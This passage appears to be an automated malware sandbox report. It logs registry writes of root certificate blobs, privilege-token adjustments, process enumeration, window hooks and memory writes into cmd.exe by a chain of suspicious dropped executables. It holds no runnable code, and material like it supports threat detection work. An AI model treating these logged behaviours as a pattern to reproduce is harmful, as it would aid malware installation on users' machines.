Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	Fri1008c7d6874.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43	installer.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A	Fri1008c7d6874.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436	Fri10720d229511df563.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde	Fri10720d229511df563.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa62000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	Fri1008c7d6874.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25	any.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43	Fri1008c7d6874.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	any.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	installer.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam 2 IoCs

Processes:

any.exeinstaller.exe

pid process

2420 any.exe
5052 installer.exe

pid	process
2420	any.exe
5052	installer.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

Fri10d184202996a0d7f.exeFri10584c049c7f.exeLfs16AJQBT5ak_PmVsl9h1tr.exe

pid	process
1040	Fri10d184202996a0d7f.exe
1700	Fri10584c049c7f.exe
1700	Fri10584c049c7f.exe
1700	Fri10584c049c7f.exe
1700	Fri10584c049c7f.exe
1700	Fri10584c049c7f.exe
1700	Fri10584c049c7f.exe
1700	Fri10584c049c7f.exe
1700	Fri10584c049c7f.exe
1700	Fri10584c049c7f.exe
1700	Fri10584c049c7f.exe
1700	Fri10584c049c7f.exe
1700	Fri10584c049c7f.exe
1700	Fri10584c049c7f.exe
1700	Fri10584c049c7f.exe
1700	Fri10584c049c7f.exe
1700	Fri10584c049c7f.exe
1700	Fri10584c049c7f.exe
1700	Fri10584c049c7f.exe
1700	Fri10584c049c7f.exe
1700	Fri10584c049c7f.exe
1700	Fri10584c049c7f.exe
1700	Fri10584c049c7f.exe
1700	Fri10584c049c7f.exe
1700	Fri10584c049c7f.exe
1700	Fri10584c049c7f.exe
1700	Fri10584c049c7f.exe
1700	Fri10584c049c7f.exe
1700	Fri10584c049c7f.exe
1700	Fri10584c049c7f.exe
1700	Fri10584c049c7f.exe
1700	Fri10584c049c7f.exe
1700	Fri10584c049c7f.exe
1700	Fri10584c049c7f.exe
1700	Fri10584c049c7f.exe
1700	Fri10584c049c7f.exe
1700	Fri10584c049c7f.exe
1700	Fri10584c049c7f.exe
1700	Fri10584c049c7f.exe
2468	Lfs16AJQBT5ak_PmVsl9h1tr.exe
2468	Lfs16AJQBT5ak_PmVsl9h1tr.exe
2468	Lfs16AJQBT5ak_PmVsl9h1tr.exe
2468	Lfs16AJQBT5ak_PmVsl9h1tr.exe
2468	Lfs16AJQBT5ak_PmVsl9h1tr.exe
2468	Lfs16AJQBT5ak_PmVsl9h1tr.exe
2468	Lfs16AJQBT5ak_PmVsl9h1tr.exe
2468	Lfs16AJQBT5ak_PmVsl9h1tr.exe
2468	Lfs16AJQBT5ak_PmVsl9h1tr.exe
2468	Lfs16AJQBT5ak_PmVsl9h1tr.exe
2468	Lfs16AJQBT5ak_PmVsl9h1tr.exe
2468	Lfs16AJQBT5ak_PmVsl9h1tr.exe
2468	Lfs16AJQBT5ak_PmVsl9h1tr.exe
2468	Lfs16AJQBT5ak_PmVsl9h1tr.exe
2468	Lfs16AJQBT5ak_PmVsl9h1tr.exe
2468	Lfs16AJQBT5ak_PmVsl9h1tr.exe
2468	Lfs16AJQBT5ak_PmVsl9h1tr.exe
2468	Lfs16AJQBT5ak_PmVsl9h1tr.exe
2468	Lfs16AJQBT5ak_PmVsl9h1tr.exe
2468	Lfs16AJQBT5ak_PmVsl9h1tr.exe
2468	Lfs16AJQBT5ak_PmVsl9h1tr.exe
2468	Lfs16AJQBT5ak_PmVsl9h1tr.exe
2468	Lfs16AJQBT5ak_PmVsl9h1tr.exe
2468	Lfs16AJQBT5ak_PmVsl9h1tr.exe
2468	Lfs16AJQBT5ak_PmVsl9h1tr.exe

Suspicious behavior: GetForegroundWindowSpam 9 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeiexplore.exe

pid process

2652 WerFault.exe
2884 WerFault.exe
2284 WerFault.exe
1296
2440 WerFault.exe
1688 WerFault.exe
2256 WerFault.exe
4388 WerFault.exe
3264 iexplore.exe
Suspicious behavior: MapViewOfSection 2 IoCs

Processes:

Fri105268dda3.exefscgbhc

pid process

2424 Fri105268dda3.exe
4496 fscgbhc

pid	process
2652	WerFault.exe
2884	WerFault.exe
2284	WerFault.exe
1296
2440	WerFault.exe
1688	WerFault.exe
2256	WerFault.exe
4388	WerFault.exe
3264	iexplore.exe

pid	process
2424	Fri105268dda3.exe
4496	fscgbhc

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

Fri10720d229511df563.exeFri10b0a06a73706.exeFri103a7805577.exetaskkill.exeWerFault.exegmJmpCzdJlKBZ6sE77joMVwc.exe

description	pid	process
Token: SeCreateTokenPrivilege	1248	Fri10720d229511df563.exe
Token: SeAssignPrimaryTokenPrivilege	1248	Fri10720d229511df563.exe
Token: SeLockMemoryPrivilege	1248	Fri10720d229511df563.exe
Token: SeIncreaseQuotaPrivilege	1248	Fri10720d229511df563.exe
Token: SeMachineAccountPrivilege	1248	Fri10720d229511df563.exe
Token: SeTcbPrivilege	1248	Fri10720d229511df563.exe
Token: SeSecurityPrivilege	1248	Fri10720d229511df563.exe
Token: SeTakeOwnershipPrivilege	1248	Fri10720d229511df563.exe
Token: SeLoadDriverPrivilege	1248	Fri10720d229511df563.exe
Token: SeSystemProfilePrivilege	1248	Fri10720d229511df563.exe
Token: SeSystemtimePrivilege	1248	Fri10720d229511df563.exe
Token: SeProfSingleProcessPrivilege	1248	Fri10720d229511df563.exe
Token: SeIncBasePriorityPrivilege	1248	Fri10720d229511df563.exe
Token: SeCreatePagefilePrivilege	1248	Fri10720d229511df563.exe
Token: SeCreatePermanentPrivilege	1248	Fri10720d229511df563.exe
Token: SeBackupPrivilege	1248	Fri10720d229511df563.exe
Token: SeRestorePrivilege	1248	Fri10720d229511df563.exe
Token: SeShutdownPrivilege	1248	Fri10720d229511df563.exe
Token: SeDebugPrivilege	1248	Fri10720d229511df563.exe
Token: SeAuditPrivilege	1248	Fri10720d229511df563.exe
Token: SeSystemEnvironmentPrivilege	1248	Fri10720d229511df563.exe
Token: SeChangeNotifyPrivilege	1248	Fri10720d229511df563.exe
Token: SeRemoteShutdownPrivilege	1248	Fri10720d229511df563.exe
Token: SeUndockPrivilege	1248	Fri10720d229511df563.exe
Token: SeSyncAgentPrivilege	1248	Fri10720d229511df563.exe
Token: SeEnableDelegationPrivilege	1248	Fri10720d229511df563.exe
Token: SeManageVolumePrivilege	1248	Fri10720d229511df563.exe
Token: SeImpersonatePrivilege	1248	Fri10720d229511df563.exe
Token: SeCreateGlobalPrivilege	1248	Fri10720d229511df563.exe
Token: 31	1248	Fri10720d229511df563.exe
Token: 32	1248	Fri10720d229511df563.exe
Token: 33	1248	Fri10720d229511df563.exe
Token: 34	1248	Fri10720d229511df563.exe
Token: 35	1248	Fri10720d229511df563.exe
Token: SeDebugPrivilege	1588	Fri10b0a06a73706.exe
Token: SeDebugPrivilege	1724	Fri103a7805577.exe
Token: SeDebugPrivilege	2160	taskkill.exe
Token: SeDebugPrivilege	2652	WerFault.exe
Token: SeCreateTokenPrivilege	2696	gmJmpCzdJlKBZ6sE77joMVwc.exe
Token: SeAssignPrimaryTokenPrivilege	2696	gmJmpCzdJlKBZ6sE77joMVwc.exe
Token: SeLockMemoryPrivilege	2696	gmJmpCzdJlKBZ6sE77joMVwc.exe
Token: SeIncreaseQuotaPrivilege	2696	gmJmpCzdJlKBZ6sE77joMVwc.exe
Token: SeMachineAccountPrivilege	2696	gmJmpCzdJlKBZ6sE77joMVwc.exe
Token: SeTcbPrivilege	2696	gmJmpCzdJlKBZ6sE77joMVwc.exe
Token: SeSecurityPrivilege	2696	gmJmpCzdJlKBZ6sE77joMVwc.exe
Token: SeTakeOwnershipPrivilege	2696	gmJmpCzdJlKBZ6sE77joMVwc.exe
Token: SeLoadDriverPrivilege	2696	gmJmpCzdJlKBZ6sE77joMVwc.exe
Token: SeSystemProfilePrivilege	2696	gmJmpCzdJlKBZ6sE77joMVwc.exe
Token: SeSystemtimePrivilege	2696	gmJmpCzdJlKBZ6sE77joMVwc.exe
Token: SeProfSingleProcessPrivilege	2696	gmJmpCzdJlKBZ6sE77joMVwc.exe
Token: SeIncBasePriorityPrivilege	2696	gmJmpCzdJlKBZ6sE77joMVwc.exe
Token: SeCreatePagefilePrivilege	2696	gmJmpCzdJlKBZ6sE77joMVwc.exe
Token: SeCreatePermanentPrivilege	2696	gmJmpCzdJlKBZ6sE77joMVwc.exe
Token: SeBackupPrivilege	2696	gmJmpCzdJlKBZ6sE77joMVwc.exe
Token: SeRestorePrivilege	2696	gmJmpCzdJlKBZ6sE77joMVwc.exe
Token: SeShutdownPrivilege	2696	gmJmpCzdJlKBZ6sE77joMVwc.exe
Token: SeDebugPrivilege	2696	gmJmpCzdJlKBZ6sE77joMVwc.exe
Token: SeAuditPrivilege	2696	gmJmpCzdJlKBZ6sE77joMVwc.exe
Token: SeSystemEnvironmentPrivilege	2696	gmJmpCzdJlKBZ6sE77joMVwc.exe
Token: SeChangeNotifyPrivilege	2696	gmJmpCzdJlKBZ6sE77joMVwc.exe
Token: SeRemoteShutdownPrivilege	2696	gmJmpCzdJlKBZ6sE77joMVwc.exe
Token: SeUndockPrivilege	2696	gmJmpCzdJlKBZ6sE77joMVwc.exe
Token: SeSyncAgentPrivilege	2696	gmJmpCzdJlKBZ6sE77joMVwc.exe
Token: SeEnableDelegationPrivilege	2696	gmJmpCzdJlKBZ6sE77joMVwc.exe

Suspicious use of FindShellTrayWindow 18 IoCs

Processes:

ultramediaburner.tmpiexplore.exeinstaller.exe

pid	process
3020	ultramediaburner.tmp
1296
1296
3264	iexplore.exe
1296
1296
3264	iexplore.exe
1296
1296
1296
1296
5052	installer.exe
1296
1296
3264	iexplore.exe
1296
1296
3264	iexplore.exe

Suspicious use of SendNotifyMessage 2 IoCs

Processes:

pid process

1296
1296

pid	process
1296
1296

Suspicious use of SetWindowsHookEx 24 IoCs

Processes:

iexplore.exeIEXPLORE.EXEIEXPLORE.EXEIEXPLORE.EXEIEXPLORE.EXE

pid	process
3264	iexplore.exe
3264	iexplore.exe
3832	IEXPLORE.EXE
3832	IEXPLORE.EXE
3832	IEXPLORE.EXE
3832	IEXPLORE.EXE
3264	iexplore.exe
3264	iexplore.exe
2908	IEXPLORE.EXE
2908	IEXPLORE.EXE
2908	IEXPLORE.EXE
2908	IEXPLORE.EXE
3264	iexplore.exe
3264	iexplore.exe
4916	IEXPLORE.EXE
4916	IEXPLORE.EXE
4916	IEXPLORE.EXE
4916	IEXPLORE.EXE
3264	iexplore.exe
3264	iexplore.exe
4812	IEXPLORE.EXE
4812	IEXPLORE.EXE
4812	IEXPLORE.EXE
4812	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

setup_x86_x64_install.exesetup_installer.exesetup_install.exe

description	pid	process	target process
PID 1124 wrote to memory of 1116	1124	setup_x86_x64_install.exe	setup_installer.exe
PID 1124 wrote to memory of 1116	1124	setup_x86_x64_install.exe	setup_installer.exe
PID 1124 wrote to memory of 1116	1124	setup_x86_x64_install.exe	setup_installer.exe
PID 1124 wrote to memory of 1116	1124	setup_x86_x64_install.exe	setup_installer.exe
PID 1124 wrote to memory of 1116	1124	setup_x86_x64_install.exe	setup_installer.exe
PID 1124 wrote to memory of 1116	1124	setup_x86_x64_install.exe	setup_installer.exe
PID 1124 wrote to memory of 1116	1124	setup_x86_x64_install.exe	setup_installer.exe
PID 1116 wrote to memory of 1924	1116	setup_installer.exe	setup_install.exe
PID 1116 wrote to memory of 1924	1116	setup_installer.exe	setup_install.exe
PID 1116 wrote to memory of 1924	1116	setup_installer.exe	setup_install.exe
PID 1116 wrote to memory of 1924	1116	setup_installer.exe	setup_install.exe
PID 1116 wrote to memory of 1924	1116	setup_installer.exe	setup_install.exe
PID 1116 wrote to memory of 1924	1116	setup_installer.exe	setup_install.exe
PID 1116 wrote to memory of 1924	1116	setup_installer.exe	setup_install.exe
PID 1924 wrote to memory of 1572	1924	setup_install.exe	cmd.exe
PID 1924 wrote to memory of 1572	1924	setup_install.exe	cmd.exe
PID 1924 wrote to memory of 1572	1924	setup_install.exe	cmd.exe
PID 1924 wrote to memory of 1572	1924	setup_install.exe	cmd.exe
PID 1924 wrote to memory of 1572	1924	setup_install.exe	cmd.exe
PID 1924 wrote to memory of 1572	1924	setup_install.exe	cmd.exe
PID 1924 wrote to memory of 1572	1924	setup_install.exe	cmd.exe
PID 1924 wrote to memory of 1992	1924	setup_install.exe	cmd.exe
PID 1924 wrote to memory of 1992	1924	setup_install.exe	cmd.exe
PID 1924 wrote to memory of 1992	1924	setup_install.exe	cmd.exe
PID 1924 wrote to memory of 1992	1924	setup_install.exe	cmd.exe
PID 1924 wrote to memory of 1992	1924	setup_install.exe	cmd.exe
PID 1924 wrote to memory of 1992	1924	setup_install.exe	cmd.exe
PID 1924 wrote to memory of 1992	1924	setup_install.exe	cmd.exe
PID 1924 wrote to memory of 1344	1924	setup_install.exe	cmd.exe
PID 1924 wrote to memory of 1344	1924	setup_install.exe	cmd.exe
PID 1924 wrote to memory of 1344	1924	setup_install.exe	cmd.exe
PID 1924 wrote to memory of 1344	1924	setup_install.exe	cmd.exe
PID 1924 wrote to memory of 1344	1924	setup_install.exe	cmd.exe
PID 1924 wrote to memory of 1344	1924	setup_install.exe	cmd.exe
PID 1924 wrote to memory of 1344	1924	setup_install.exe	cmd.exe
PID 1924 wrote to memory of 1436	1924	setup_install.exe	cmd.exe
PID 1924 wrote to memory of 1436	1924	setup_install.exe	cmd.exe
PID 1924 wrote to memory of 1436	1924	setup_install.exe	cmd.exe
PID 1924 wrote to memory of 1436	1924	setup_install.exe	cmd.exe
PID 1924 wrote to memory of 1436	1924	setup_install.exe	cmd.exe
PID 1924 wrote to memory of 1436	1924	setup_install.exe	cmd.exe
PID 1924 wrote to memory of 1436	1924	setup_install.exe	cmd.exe
PID 1924 wrote to memory of 608	1924	setup_install.exe	cmd.exe
PID 1924 wrote to memory of 608	1924	setup_install.exe	cmd.exe
PID 1924 wrote to memory of 608	1924	setup_install.exe	cmd.exe
PID 1924 wrote to memory of 608	1924	setup_install.exe	cmd.exe
PID 1924 wrote to memory of 608	1924	setup_install.exe	cmd.exe
PID 1924 wrote to memory of 608	1924	setup_install.exe	cmd.exe
PID 1924 wrote to memory of 608	1924	setup_install.exe	cmd.exe
PID 1924 wrote to memory of 1260	1924	setup_install.exe	cmd.exe
PID 1924 wrote to memory of 1260	1924	setup_install.exe	cmd.exe
PID 1924 wrote to memory of 1260	1924	setup_install.exe	cmd.exe
PID 1924 wrote to memory of 1260	1924	setup_install.exe	cmd.exe
PID 1924 wrote to memory of 1260	1924	setup_install.exe	cmd.exe
PID 1924 wrote to memory of 1260	1924	setup_install.exe	cmd.exe
PID 1924 wrote to memory of 1260	1924	setup_install.exe	cmd.exe
PID 1924 wrote to memory of 1080	1924	setup_install.exe	cmd.exe
